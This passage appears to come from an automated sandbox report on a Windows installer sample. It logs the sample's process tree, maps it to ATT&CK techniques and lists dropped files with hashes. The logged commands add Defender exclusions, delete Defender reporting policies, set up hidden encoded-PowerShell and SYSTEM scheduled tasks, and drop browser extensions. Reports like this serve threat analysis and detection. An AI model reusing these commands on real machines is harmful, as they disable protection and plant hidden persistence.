                                                                                                          PID:4240
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\sUklQelueKqzsVVB /t REG_DWORD /d 0 /reg:32
                                                                                                          3⤵
                                                                                                            PID:3416
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\sUklQelueKqzsVVB /t REG_DWORD /d 0 /reg:64
                                                                                                            3⤵
                                                                                                              PID:3712
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                              3⤵
                                                                                                                PID:2676
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                3⤵
                                                                                                                  PID:396
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:3880
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:2024
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF /t REG_DWORD /d 0 /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:444
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF /t REG_DWORD /d 0 /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:4672
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\szdKxxrFMiVXCdXj /t REG_DWORD /d 0 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:5092
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\szdKxxrFMiVXCdXj /t REG_DWORD /d 0 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:732
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /CREATE /TN "giSvwJaTz" /SC once /ST 14:47:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                            2⤵
                                                                                                                            • Creates scheduled task(s)
                                                                                                                            PID:4660
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /run /I /tn "giSvwJaTz"
                                                                                                                            2⤵
                                                                                                                              PID:3908
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              schtasks /DELETE /F /TN "giSvwJaTz"
                                                                                                                              2⤵
                                                                                                                                PID:4992
                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                schtasks /CREATE /TN "NDmpcgCvNfyvVRxht" /SC once /ST 10:34:51 /RU "SYSTEM" /TR "\"C:\Windows\Temp\szdKxxrFMiVXCdXj\ftQFJCRfveHPGNc\bOzsvbt.exe\" qh /QJsite_idwgF 525403 /S" /V1 /F
                                                                                                                                2⤵
                                                                                                                                • Drops file in Windows directory
                                                                                                                                • Creates scheduled task(s)
                                                                                                                                PID:3716
                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                schtasks /run /I /tn "NDmpcgCvNfyvVRxht"
                                                                                                                                2⤵
                                                                                                                                  PID:5108
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                1⤵
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:1292
                                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                  2⤵
                                                                                                                                    PID:3944
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                  1⤵
                                                                                                                                    PID:1072
                                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                                    1⤵
                                                                                                                                      PID:3988
                                                                                                                                    • C:\Windows\Temp\szdKxxrFMiVXCdXj\ftQFJCRfveHPGNc\bOzsvbt.exe
                                                                                                                                      C:\Windows\Temp\szdKxxrFMiVXCdXj\ftQFJCRfveHPGNc\bOzsvbt.exe qh /QJsite_idwgF 525403 /S
                                                                                                                                      1⤵
                                                                                                                                      • Checks computer location settings
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Drops Chrome extension
                                                                                                                                      • Drops desktop.ini file(s)
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:448
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /DELETE /F /TN "bQrKcOXclPyMmQgfTY"
                                                                                                                                        2⤵
                                                                                                                                          PID:1788
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                          2⤵
                                                                                                                                            PID:4044
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:3392
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                              2⤵
                                                                                                                                                PID:3800
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:4472
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\icEyDogKU\pjCtcT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "NplADKkCBziqQHN" /V1 /F
                                                                                                                                                  2⤵
                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                  PID:4320
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /CREATE /TN "NplADKkCBziqQHN2" /F /xml "C:\Program Files (x86)\icEyDogKU\XjwxiDF.xml" /RU "SYSTEM"
                                                                                                                                                  2⤵
                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                  PID:2236
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /END /TN "NplADKkCBziqQHN"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:3820
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /DELETE /F /TN "NplADKkCBziqQHN"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4436
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /CREATE /TN "GHwlerDeIQsNdm" /F /xml "C:\Program Files (x86)\ycMZCyUlVfbU2\Uopdehw.xml" /RU "SYSTEM"
                                                                                                                                                      2⤵
                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                      PID:4080
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /CREATE /TN "XFllyoUkeQVbq2" /F /xml "C:\ProgramData\sUklQelueKqzsVVB\DHGHIBM.xml" /RU "SYSTEM"
                                                                                                                                                      2⤵
                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                      PID:3124
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /CREATE /TN "asZjWRxPJGYSVOeSc2" /F /xml "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR\gVPuKaM.xml" /RU "SYSTEM"
                                                                                                                                                      2⤵
                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                      PID:3968
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /CREATE /TN "hcGrzUAxWeRcgCYFZrx2" /F /xml "C:\Program Files (x86)\yczsUHdtPuMxC\iEvWwsd.xml" /RU "SYSTEM"
                                                                                                                                                      2⤵
                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                      PID:4396
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /CREATE /TN "yWyixlOEsLxsTwFTt" /SC once /ST 14:57:01 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\szdKxxrFMiVXCdXj\YZvSYIgU\JkdbdRc.dll\",#1 /gSsite_idYOW 525403" /V1 /F
                                                                                                                                                      2⤵
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                      PID:4864
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /run /I /tn "yWyixlOEsLxsTwFTt"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:3856
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                        2⤵
                                                                                                                                                          PID:3568
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:524
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                            2⤵
                                                                                                                                                              PID:3860
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:4992
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                schtasks /DELETE /F /TN "NDmpcgCvNfyvVRxht"
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:2844
                                                                                                                                                              • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\szdKxxrFMiVXCdXj\YZvSYIgU\JkdbdRc.dll",#1 /gSsite_idYOW 525403
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:1348
                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\szdKxxrFMiVXCdXj\YZvSYIgU\JkdbdRc.dll",#1 /gSsite_idYOW 525403
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                    PID:3312
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      schtasks /DELETE /F /TN "yWyixlOEsLxsTwFTt"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:2076

                                                                                                                                                                  Network

                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                  Execution

                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                  1
                                                                                                                                                                  T1053

                                                                                                                                                                  Persistence

                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                  1
                                                                                                                                                                  T1053

                                                                                                                                                                  Privilege Escalation

                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                  1
                                                                                                                                                                  T1053

                                                                                                                                                                  Credential Access

                                                                                                                                                                  Unsecured Credentials

                                                                                                                                                                  1
                                                                                                                                                                  T1552

                                                                                                                                                                  Credentials In Files

                                                                                                                                                                  1
                                                                                                                                                                  T1552.001

                                                                                                                                                                  Discovery

                                                                                                                                                                  Query Registry

                                                                                                                                                                  4
                                                                                                                                                                  T1012

                                                                                                                                                                  System Information Discovery

                                                                                                                                                                  4
                                                                                                                                                                  T1082

                                                                                                                                                                  Collection

                                                                                                                                                                  Data from Local System

                                                                                                                                                                  1
                                                                                                                                                                  T1005

                                                                                                                                                                  Replay Monitor

                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                  Downloads

                                                                                                                                                                  • C:\Program Files (x86)\PhaWElAePoHhBdUTFeR\gVPuKaM.xml
                                                                                                                                                                    Filesize

                                                                                                                                                                    2KB

                                                                                                                                                                    MD5

                                                                                                                                                                    0d84da7e28d34f53ac065e67e51743fd

                                                                                                                                                                    SHA1

                                                                                                                                                                    a7dc75e4810731c459c1ed41eb573f6e01d751ef

                                                                                                                                                                    SHA256

                                                                                                                                                                    a39030ebcfe8d4c8c09155cf5e551b3c22f355cb4eb1121beeb1c81a3aef30c4

                                                                                                                                                                    SHA512

                                                                                                                                                                    be4e774a6c04179c020887bbe4fc21f599c07f532992b406c29e404f9ac883f362c41f7513222ebacd3ab25475a52f3c1da709de6ceb31e7a8fd954b15d066ae

                                                                                                                                                                  • C:\Program Files (x86)\icEyDogKU\XjwxiDF.xml
                                                                                                                                                                    Filesize

                                                                                                                                                                    2KB

                                                                                                                                                                    MD5

                                                                                                                                                                    e0640584084ea9b1ad467066dc0c8db5

                                                                                                                                                                    SHA1

                                                                                                                                                                    01ad1d19602fe199d21a824f325bfe5e63a81ed7

                                                                                                                                                                    SHA256

                                                                                                                                                                    df6b3266acfcd3fffe0bd6488b879ace1c9f6502ccc69bc052b90b7d7d6d418f

                                                                                                                                                                    SHA512

                                                                                                                                                                    39901f29f8f720d484eef507876b2dbf97e210013d1d342b2de4680943c4313df49a238a98bda65122e436f5ff7ca4e03f1cd3ad7fb0550f0c8c9f4a1e2dd9f8

                                                                                                                                                                  • C:\Program Files (x86)\ycMZCyUlVfbU2\Uopdehw.xml
                                                                                                                                                                    Filesize

                                                                                                                                                                    2KB

                                                                                                                                                                    MD5

                                                                                                                                                                    1d9a78aac525d98dc0ca6cb9948c64de

                                                                                                                                                                    SHA1

                                                                                                                                                                    e19ec404868e6f2d7a2676926da045ba4933a166

                                                                                                                                                                    SHA256

                                                                                                                                                                    b4128d2859d69c5560ccef2beaecafda0da3abd87909ce6c9a1690ddad68ac21

                                                                                                                                                                    SHA512

                                                                                                                                                                    1a5e9ae245c8508e4e042fef741c9e38c01a9761c92248313f56086966be3adfc3698dff6801386b10d8cccf4009adc8aa0bb3339681e82d7397c4a14beab778

                                                                                                                                                                  • C:\Program Files (x86)\yczsUHdtPuMxC\iEvWwsd.xml
                                                                                                                                                                    Filesize

                                                                                                                                                                    2KB

                                                                                                                                                                    MD5

                                                                                                                                                                    ec8ba07adc472dc1cf2789bd565e45e7

                                                                                                                                                                    SHA1

                                                                                                                                                                    93fcf4d07d42a79645557bf7c78522bd1feed5cf

                                                                                                                                                                    SHA256

                                                                                                                                                                    adea3c1c7599414e228fbe2b62d312b8a91891b75bea5454b9a6e7a0ccd1c3b9

                                                                                                                                                                    SHA512

                                                                                                                                                                    5db51c29539b318819f4aeb53f39858dc61e5d2c22f47fcfd58383db9bfed6a08896e26726200d50e1ecd6239c729783e437a572ee09b0161945b33b3ee517fe

                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi
                                                                                                                                                                    Filesize

                                                                                                                                                                    1.4MB

                                                                                                                                                                    MD5

                                                                                                                                                                    072985dd710bf0da72fd5f40d04a5daa

                                                                                                                                                                    SHA1

                                                                                                                                                                    f076acee903e16e02068ecec0f256299173e7dba

                                                                                                                                                                    SHA256

                                                                                                                                                                    f14f70ad947dd43540b84d79ee58dc2fffc94fa9f3388ea26281e7f60653c21e

                                                                                                                                                                    SHA512

                                                                                                                                                                    4971a7090c6ef887f0286a30fd5d855d7489a56d0fccf1045e30a544dac835dcd04394c44005350ff44705762e0ff6cda3f2ba3621d5d0388d06e4accba42d2b

                                                                                                                                                                  • C:\ProgramData\sUklQelueKqzsVVB\DHGHIBM.xml
                                                                                                                                                                    Filesize

                                                                                                                                                                    2KB

                                                                                                                                                                    MD5

                                                                                                                                                                    7bda1f99ea20f201f85747635ebcfa51

                                                                                                                                                                    SHA1

                                                                                                                                                                    83d35cda8323913b3cde212ec92a7e2821800f88

                                                                                                                                                                    SHA256

                                                                                                                                                                    cbed710badd27c8faa2112f5b978a3ab89b2561cdb512f78058b7dcf41eb8a23

                                                                                                                                                                    SHA512

                                                                                                                                                                    164f9ecac032a2680a39f0980ad709d665d80d4c94c60de6ed9d98c146cbc8030844b8bcd0636745d6457d1b6c5575431770574e992e62d9816827d4b7ead1a3

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
                                                                                                                                                                    Filesize

                                                                                                                                                                    187B

                                                                                                                                                                    MD5

                                                                                                                                                                    2a1e12a4811892d95962998e184399d8

                                                                                                                                                                    SHA1

                                                                                                                                                                    55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                    SHA256

                                                                                                                                                                    32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                    SHA512

                                                                                                                                                                    bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
                                                                                                                                                                    Filesize

                                                                                                                                                                    136B

                                                                                                                                                                    MD5

                                                                                                                                                                    238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                    SHA1

                                                                                                                                                                    0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                    SHA256

                                                                                                                                                                    801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                    SHA512

                                                                                                                                                                    2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
                                                                                                                                                                    Filesize

                                                                                                                                                                    150B

                                                                                                                                                                    MD5

                                                                                                                                                                    0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                    SHA1

                                                                                                                                                                    6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                    SHA256

                                                                                                                                                                    0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                    SHA512

                                                                                                                                                                    5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                                    Filesize

                                                                                                                                                                    10KB

                                                                                                                                                                    MD5

                                                                                                                                                                    a761974c9b4dbcfedfead9988a39f022

                                                                                                                                                                    SHA1

                                                                                                                                                                    a42035669aa74f012dd6c6906fdbeeedd3a477d1

                                                                                                                                                                    SHA256

                                                                                                                                                                    032d0898b142ed8ff7216f6dd93befb9074c41a465b222efde2ebaaee638f59d

                                                                                                                                                                    SHA512

                                                                                                                                                                    79988344afa265dde03ded38737c1244820cb142853843eadfdeb331e937ac7d13a576cb07ad966ec1b4acc0b1f57e910a9e7bf350f624a509aec172b727c703

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                                                                                                                    Filesize

                                                                                                                                                                    35KB

                                                                                                                                                                    MD5

                                                                                                                                                                    4c5a62c50a2755291cd4514a8d70b629

                                                                                                                                                                    SHA1

                                                                                                                                                                    9ca469c53dfaae877cc5c669a934e83d1163e74e

                                                                                                                                                                    SHA256

                                                                                                                                                                    49f430a962c0e6e430ad21f92ad8ba5859f4e0b6776f4f4cedf032762d3c016b

                                                                                                                                                                    SHA512

                                                                                                                                                                    bc7325f24d5786bf2721712066ae586a7eddfdd7f5a999a9a45db8b28e83e789a7b9575ab863e667666d0ee0105b4562dddad897d59737aa166310ed083af1e9

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
                                                                                                                                                                    Filesize

                                                                                                                                                                    2KB

                                                                                                                                                                    MD5

                                                                                                                                                                    6cf293cb4d80be23433eecf74ddb5503

                                                                                                                                                                    SHA1

                                                                                                                                                                    24fe4752df102c2ef492954d6b046cb5512ad408

                                                                                                                                                                    SHA256

                                                                                                                                                                    b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                                                                                                                    SHA512

                                                                                                                                                                    0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\abgdohlnibdejcajjfmngebmdanjldcc\1.2_0\_locales\es\messages.json
                                                                                                                                                                    Filesize

                                                                                                                                                                    151B

                                                                                                                                                                    MD5

                                                                                                                                                                    bd6b60b18aee6aaeb83b35c68fb48d88

                                                                                                                                                                    SHA1

                                                                                                                                                                    9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                                                                                                                    SHA256

                                                                                                                                                                    b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                                                                                                                    SHA512

                                                                                                                                                                    3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                    Filesize

                                                                                                                                                                    9KB

                                                                                                                                                                    MD5

                                                                                                                                                                    c2c98c97998b240348f24a43d4c3cdb0

                                                                                                                                                                    SHA1

                                                                                                                                                                    5a991f43003543a947ecbbf7b9420d0c478c76b2

                                                                                                                                                                    SHA256

                                                                                                                                                                    0b27f7c9d58e6a8643d62d8a067cbf72aff98939944c29f743829fcabf40c707

                                                                                                                                                                    SHA512

                                                                                                                                                                    b254a65e1ad1e85c22139e2871e15436ab076fbac4358a7d35943935fc83fdc736070d5fec4158428b1cf2f0eb349d90db57564b3df5f224bbf057a9b476ea89

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                    Filesize

                                                                                                                                                                    64B

                                                                                                                                                                    MD5

                                                                                                                                                                    d8b9a260789a22d72263ef3bb119108c

                                                                                                                                                                    SHA1

                                                                                                                                                                    376a9bd48726f422679f2cd65003442c0b6f6dd5

                                                                                                                                                                    SHA256

                                                                                                                                                                    d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

                                                                                                                                                                    SHA512

                                                                                                                                                                    550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS490F.tmp\Install.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    6.1MB

                                                                                                                                                                    MD5

                                                                                                                                                                    4559ccf3170b3d54d1e609127095b62b

                                                                                                                                                                    SHA1

                                                                                                                                                                    3af63239d7ec4c235c824c73433bd7b19c8909e6

                                                                                                                                                                    SHA256

                                                                                                                                                                    6ca4c4fbd0923135bcf18df192de8a3eb1be7de17c4d5585af6b3d7fcb5c6297

                                                                                                                                                                    SHA512

                                                                                                                                                                    c8c1d632ae5a2cb298ce8338049b164ce6221f8209842b7ceb17dcde77f0c922d93434354618bd1494af599ce5e108dd6633efae4b3dc8f20359f3a235115f22

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS490F.tmp\Install.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    6.1MB

                                                                                                                                                                    MD5

                                                                                                                                                                    4559ccf3170b3d54d1e609127095b62b

                                                                                                                                                                    SHA1

                                                                                                                                                                    3af63239d7ec4c235c824c73433bd7b19c8909e6

                                                                                                                                                                    SHA256

                                                                                                                                                                    6ca4c4fbd0923135bcf18df192de8a3eb1be7de17c4d5585af6b3d7fcb5c6297

                                                                                                                                                                    SHA512

                                                                                                                                                                    c8c1d632ae5a2cb298ce8338049b164ce6221f8209842b7ceb17dcde77f0c922d93434354618bd1494af599ce5e108dd6633efae4b3dc8f20359f3a235115f22

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4B03.tmp\Install.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    6b7269665d6d4db4cb0b5982cc6decc3

                                                                                                                                                                    SHA1

                                                                                                                                                                    5bbac281f40602c98b2a12082b6de481b7c135b2

                                                                                                                                                                    SHA256

                                                                                                                                                                    77f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8

                                                                                                                                                                    SHA512

                                                                                                                                                                    a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4B03.tmp\Install.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    6b7269665d6d4db4cb0b5982cc6decc3

                                                                                                                                                                    SHA1

                                                                                                                                                                    5bbac281f40602c98b2a12082b6de481b7c135b2

                                                                                                                                                                    SHA256

                                                                                                                                                                    77f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8

                                                                                                                                                                    SHA512

                                                                                                                                                                    a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\MmoByBS.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    6b7269665d6d4db4cb0b5982cc6decc3

                                                                                                                                                                    SHA1

